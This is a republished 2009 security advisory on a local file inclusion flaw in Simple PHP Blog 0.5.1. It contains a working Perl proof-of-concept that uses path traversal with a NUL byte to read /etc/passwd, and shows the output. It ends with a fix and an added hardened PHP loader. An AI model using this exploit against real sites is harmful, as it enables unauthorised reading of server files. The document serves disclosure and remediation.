Simple PHP Blog 0.5.1 Local File Inclusion

Reported 18 Dec 2009 by Juan Galiana Lara
Source: packetstorm (packetstormsecurity.com)

Local File Inclusion vulnerability in Simple PHP Blog 0.5.

Code
=============================================  
INTERNET SECURITY AUDITORS ALERT 2009-005  
- Original release date: March 2nd, 2009  
- Last revised: December 18th, 2009  
- Discovered by: Juan Galiana Lara  
- Severity: 6.8/10 (CVSS scored)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Simple PHP Blog <= 0.5.1 Local File Include vulnerability  
  
II. BACKGROUND  
-------------------------  
Simple PHP Blog is a blog system that does not require a database setup  
and is very easy to install.  
  
III. DESCRIPTION  
-------------------------  
Simple PHP Blog <= 0.5.1 is affected by a Local File Include  
vulnerability in 'languages_cgi.php' because the 'blog_language1'  
parameter is not properly sanitized.  
  
IV. PROOF OF CONCEPT  
-------------------------  
The affected code:  
  
62 require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');  
  
Exploit:  
  
#!/usr/bin/perl  
# Local File Include Exploit  
# Simple PHP Blog <= 0.5.1  
# jgaliana <at> isecauditors=dot=com  
# Internet Security Auditors  
  
use strict;  
use warnings;  
use LWP::UserAgent;  
use HTTP::Request;  
  
# Arguments: host, application path, file to request, session cookie value  
if ($#ARGV < 3) { die("Usage: $0 <site> <path> <file> <cookie>"); }  
my $ua = LWP::UserAgent->new;  
$ua->agent("Simple PHP Blog Exploit ^_^");  
$ua->default_header('Cookie' => "sid=$ARGV[3]");  
# POST request to the vulnerable script  
my $req = HTTP::Request->new(POST => "http://$ARGV[0]$ARGV[1]/languages_cgi.php");  
$req->content_type('application/x-www-form-urlencoded');  
$req->content("blog_language1=../../../../..$ARGV[2]%00");  
my $res = $ua->request($req);  
  
if ($res->is_success) {  
    print $res->content;  
} else {  
    print "Error: " . $res->status_line, "\n";  
}  
  
$ perl simple.pl example.com /blog /etc/passwd <my_cookie_here>|head -1  
root:*:0:0:root:/root:/bin/bash  
  
The bug can be exploited with or without 'magic_quotes_gpc'. If  
magic_quotes_gpc is Off, an attacker can append a '\0' character and  
read any file, such as /etc/passwd; if it is On, the include is limited  
to PHP files, which still allows execution of arbitrary local PHP files.  
  
V. BUSINESS IMPACT  
-------------------------  
The attacker can read arbitrary files with the privileges of the web  
server and execute arbitrary local PHP scripts.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Versions up to and including 0.5.1 are affected.  
To patch the application, the affected code must additionally validate  
the value with the functions file_exists() and basename().  
  
VII. SOLUTION  
-------------------------  
Change line 62 of languages_cgi.php so that the $_POST[ 'blog_language1' ]  
variable is filtered before it is used in the include path:  
  
if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ]))  
    require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');  
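The following is an added example, not code from the advisory or from the Simple PHP Blog project. It shows a hardened loader that combines the whitelist check above with the basename() and file_exists() checks section VI asks for, and adds a realpath() containment check so that a resolved path outside the languages directory is rejected even if an earlier layer is bypassed. The function names, the `languages_dir` argument and the temporary demo layout are assumptions. ereg() was removed in PHP 7, so the same pattern is expressed with preg_match(); `\z` is used instead of `$` so that a trailing newline cannot slip past the anchor.

```php
<?php
// Added example: hardened replacement for the require_once on line 62 of
// languages_cgi.php. Function names and the demo directory are assumptions.

/**
 * Return the absolute path of <languages_dir>/<name>/strings.php when <name>
 * is a safe, existing language directory, or null otherwise.
 */
function resolve_language_strings(string $requested, string $languages_dir): ?string
{
    // 1. Whitelist: alphanumerics and underscores only. This rejects '/', '..'
    //    and NUL bytes, so the traversal/truncation shape from the PoC never
    //    reaches the filesystem calls below.
    if (!preg_match('/^[A-Za-z0-9_]+\z/', $requested)) {
        return null;
    }

    // 2. basename() as a second layer: strips any directory component.
    $name = basename($requested);

    // 3. Resolve both sides with realpath(); it returns false for a missing
    //    file, which doubles as the file_exists() check the advisory calls for.
    $base = realpath($languages_dir);
    $candidate = realpath($languages_dir . DIRECTORY_SEPARATOR . $name
                          . DIRECTORY_SEPARATOR . 'strings.php');
    if ($base === false || $candidate === false) {
        return null;
    }

    // 4. Containment: the resolved file must live below the languages directory.
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

/** Include the validated strings file, falling back to a known-good default. */
function load_language_strings(string $requested, string $languages_dir, string $default = 'en'): string
{
    $path = resolve_language_strings($requested, $languages_dir);
    if ($path === null) {
        $path = $languages_dir . DIRECTORY_SEPARATOR . $default . DIRECTORY_SEPARATOR . 'strings.php';
    }
    require_once $path;
    return $path;
}

// Constructed demo layout: only languages/en/strings.php exists.
$tmp = sys_get_temp_dir() . '/sphpblog_demo_' . getmypid();
mkdir("$tmp/languages/en", 0700, true);
file_put_contents("$tmp/languages/en/strings.php", "<?php\n// constructed demo strings file\n");

$inputs = [
    'en',                           // a real language directory
    'fr',                           // well-formed name, but no such directory
    "../../../../../etc/passwd\0",  // the traversal + NUL shape from the PoC
    "en\n",                         // valid name with a trailing newline
];
foreach ($inputs as $in) {
    $r = resolve_language_strings($in, "$tmp/languages");
    printf("%-30s => %s\n", addcslashes($in, "\0\n"), $r === null ? 'rejected' : 'ok');
}
echo 'loaded: ', load_language_strings('fr', "$tmp/languages"), "\n";

// Clean up the constructed layout.
unlink("$tmp/languages/en/strings.php");
rmdir("$tmp/languages/en");
rmdir("$tmp/languages");
rmdir($tmp);
```

The whitelist alone is sufficient for this bug; basename() and the realpath() containment check are defence in depth, so that a later change to the regex (or a second code path that builds the same include) does not silently reopen the traversal.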
  
VIII. REFERENCES  
-------------------------  
http://www.simplephpblog.com  
http://sourceforge.net/projects/sphpblog/  
http://www.isecauditors.com  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
March 02, 2009: Initial release.  
December 18, 2009: Last revision.  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
March 02, 2009: Vulnerability acquired by  
Internet Security Auditors (www.isecauditors.com)  
March 03, 2009: Notified to developer. No response.  
December 13, 2009: Notified again. No response.  
December 18, 2009: Added mitigation solution and sent to lists.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors accepts no responsibility for any damage  
caused by the use or misuse of this information.  
